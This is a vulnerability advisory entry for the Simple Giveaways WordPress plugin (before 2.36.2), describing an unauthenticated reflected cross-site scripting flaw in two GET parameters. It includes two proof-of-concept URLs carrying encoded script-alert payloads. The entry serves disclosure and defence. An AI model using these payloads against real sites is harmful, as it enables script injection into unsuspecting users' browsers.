WordPress Plugin Vulnerabilities
Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
Proof of Concept
https://example.com/giveaway/mygiveaways/?share=%3Cscript%3Ealert(document.domain)%3C/script%3E https://example.com/giveaway/mygiveaways/?method=%3Cscript%3Ealert(/XSS/)%3C/script%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-09 (about 3 years ago)
Added
2021-05-09 (about 3 years ago)
Last Updated
2021-05-09 (about 3 years ago)